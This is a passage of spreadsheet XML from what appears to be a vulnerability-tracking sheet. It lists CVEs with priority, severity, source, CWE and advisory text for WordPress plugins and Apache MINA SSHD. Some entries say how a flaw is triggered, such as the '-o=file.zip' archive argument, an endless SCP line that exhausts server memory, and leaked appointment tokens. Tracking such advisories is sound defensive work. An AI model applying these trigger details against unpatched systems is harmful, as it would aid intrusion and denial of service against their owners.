          <t>CWE-79</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Happy Addons for Elementor &lt;= 3.23.1 versions.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62080</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62084</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeff Starr User Submitted Posts allows Stored XSS.
This issue affects User Submitted Posts: from n/a through 20260810.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62084</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67075</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>psirt@hcl.com</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>HCL Digital Experience is affected by improper input sanitation.  This can result in HTML injection which could be leveraged in content spoofing from a trusted domain. Apply HCL Digital Experience 9.5 CF238 or later to address this.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67075</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91109</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.12.31 via the 'complete_group' parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to disclose every co-booker's private per-appointment id_token (exposed as public_token) alongside their PII (name and email address), then use each leaked token to read, overwrite arbitrary appointment meta on, or cancel the co-booker's appointment via the same REST controller. Exploitation requires the attacker to possess a valid id_token for any single appointment within the targeted group booking.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91109</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93995</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in sshd-git in Apache MINA SSHD, versions up to 2.19.0 and 3.0.0-M1 to 3.0.0-M5. Apache 
MINA SSHD is a Java library for client-side and server-side SSH.
Component org.apache.sshd:sshd-git provides though class GitPgmCommandFactory a way to configure an Apache MINA SSHD server such 
that authenticated SSH clients can remotely execute git commands via the JGit library 
on git repositories stored on the server. In CVE-2026-58624 this mechanism was restricted to only a few git commands, including "git archive" without "--output" or "-o" options such that the resulting archive would not be written on the server but instead sent back to the client over the SSH connection.
The fix done for CVE-2026-58624 was insufficient as it missed removing the single-argument "-o=file.zip" version of the command parameter from the "archive" command.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93995</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93996</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled resource consumption in component ssd-scp in Apache MINA SSHD versions up to 2.19.0 or 3.0.0-M1 to 3.0.0-M5. Apache MINA SSHD is a Java library for client-side and server-side SSH.
Component sshd-scp of Apache MINA SSHD provides a Java implementation of SCP. The SCP command protocol is line-oriented with LF-terminated lines. The protocol handler in sshd-scp did not impose any limit on the length of such protocol lines. A malicious peer just sending a junk command containing a never-ending sequence of characters but never a LF would cause the receiver to allocate memory to store this whole junk command, exhausting memory and crashing the application with an OutOfMemoryError.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue by enforcing an upper limit on the length of SCP protocol lines.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93996</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94029</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="inlineStr"/>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>Server-side memory exhaustion in Apache MINA SSHD 1.0.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5, component sshd-sftp, in the SFTP v6 check-file-name/check-file-handle extension. Apache MINA SSHD is a Java library for client-side and server-side SSH.
Using a very small "block size" (for instance 256, which is the minimum) on a huge file generates many (file size / block size) hashes. The resulting SFTP reply message was accumulated fully in memory server-side, which could, with a suitably large (possibly sparse) file exhaust the server-side memory, taking down the server.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue by imposing a maximum limit on the size of the reply. Many SFTP implementations have a general limit on the size of SFTP messages anyway; typically 256kB as in OpenSSH or also in Apache MINA SSHD.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94029</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94074</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Simply Schedule Appointments &lt;= 1.6.12.29 versions.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94074</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94077</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Safe SVG &lt;= 2.5.0 versions.</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94077</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94674</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Pixel Manager for WooCommerce &lt;= 1.69.0 versions.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94674</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96338</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in Profile Builder &lt;= 4.0.2 versions.</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96338</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96347</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t>Subscriber Insecure Direct Object References (IDOR) in Bookly &lt;= 28.2 versions.</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96347</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96829</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in The Plus Addons for Elementor Page Builder Lite &lt;= 6.5.1 versions.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96829</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96834</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>Subscriber Sensitive Data Exposure in GiveWP &lt;= 4.16.9 versions.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96834</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96835</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in King Addons for Elementor &lt;= 51.1.85 versions.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96835</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97067</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in EWWW Image Optimizer &lt;= 8.7.7 versions.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97067</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97236</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="inlineStr"/>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in ThemeREX Addons &lt; 2.45.0 versions.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97236</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
